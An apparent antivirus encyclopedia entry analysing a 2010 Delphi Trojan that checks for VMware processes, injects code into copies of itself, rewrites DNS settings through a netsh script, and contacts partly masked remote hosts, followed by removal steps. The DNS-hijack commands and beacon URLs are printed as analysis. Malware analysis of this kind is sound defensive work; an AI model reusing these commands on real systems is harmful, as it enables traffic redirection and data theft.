|Detected||Aug 09 2010 12:19 GMT|
|Released||Aug 09 2010 20:58 GMT|
|Published||Oct 26 2010 10:21 GMT|
This Trojan has a malicious payload. It is a Windows application (PE EXE file). It is 585 661 bytes in size. It is written in Delphi.
The program's main window is shown below:
Once launched, the Trojan performs the following actions:
VMwareUser.exe VMwareService.exe VMwareTray.exe
%Documents and Settings%\All Users\Templates\Directdb.xmlFor Windows Vista and Windows 7:
%Temporary Internet Files%\Directdb.xmlIt moves these files under the following names respectively:
%Documents and Settings%\All Users\Templates\qweoi.tmp %Temporary Internet Files%\qweoi.tmpThen it executes a deferred deletion of these files (the origin or ownership of the deleted files by certain applications has not been established).
The Trojan also launches two copies of its body, into which it injects a code from its resources.
The code injected into the first copy is 99 328 bytes in size. It is detected by Kaspersky Anti-Virus as Trojan-Downloader.Win32.Agent.eisi. The injected code performs the following actions:
<X>:\tmp.logwhere <X> indicates the system disk.
ipconfig.exe /all >C:\tmp.logThis command makes it possible to save Windows IP protocol settings to the file "C:\tmp.log".
pushd interface ip set dns name="<Name>" source=static addr=121.***.240 register= PRIMARY add dns name="<Name>" addr=125.***.219 index=2 set wins name="<Name>" source=static addr=none popdwhere <Name> is the name of the network connection, for example "Local Area Connection". It runs the command shown below:
netsh.exe -f C:\tmp.logThis modifies the addresses of the main and auxiliary DNS servers, and, as a consequence, redirects all DNS requests to specified addresses (the DNS server modification method is implemented in such a way as to work only in those systems where the string "Ethernet adapter" when executing the "ipconfig /all" command has not been localized, i.e. it has not been translated into a national language. This method, for example, does not work for Russian localization, as the mentioned string is not encountered when the "ipconfig /all" command is displayed, since the localized string "Ethernet àäàïòåð" is displayed in its place.
http://www.qq***nead.com/GetServer.asp?Mac=<StartPage>&otherInfo=okwhere <StartPage> is the home page, received from the following registry key:
[HKCU\Software\Microsoft\Internet Explorer\Main\Start Page]
C:\RECYCLER\where it places its body as:
Temp.datand executes deferred deletion of this file. The code injected into the second copy is 479 232 bytes in size. This code performs the following actions:
http://yuanfa***43759.com/xg/updateinfo.htmAt the time of writing, this resource was not accessible.
The data received in response to this request is checked for the requested data (response code 200) and for the string
StartThe received data is then processed (presumably, the received data contains a list, possibly of URL addresses, as we can see in the code responsible for handling the received data that an extensive search is performed for delimiters, however the data processing mechanism has not been investigated, as the resource is no longer available and the data processing mechanism is data-driven).
:try del /q /f "<Path_to_original_body_of_trojan>" if exist <Path_to_original_body_of_trojan> goto try del %0Running this file deletes the body of the Trojan.
If your computer does not have antivirus protection and has been infected by this malicious program, follow the instructions below to delete it:
%Temp%\<rnd> <X>:\tmp.logwhere <X> indicates the system disk.
This type of behaviour covers malicious programs that delete, block, modify, or copy data, disrupt computer or network performance, but which cannot be classified under any of the behaviours identified above.
This classification also covers “multipurpose” Trojan programs, i.e. those that are capable of conducting several actions at once and which demonstrate several Trojan behaviours in a single program. This means they cannot be indisputably classified as having any single behaviour.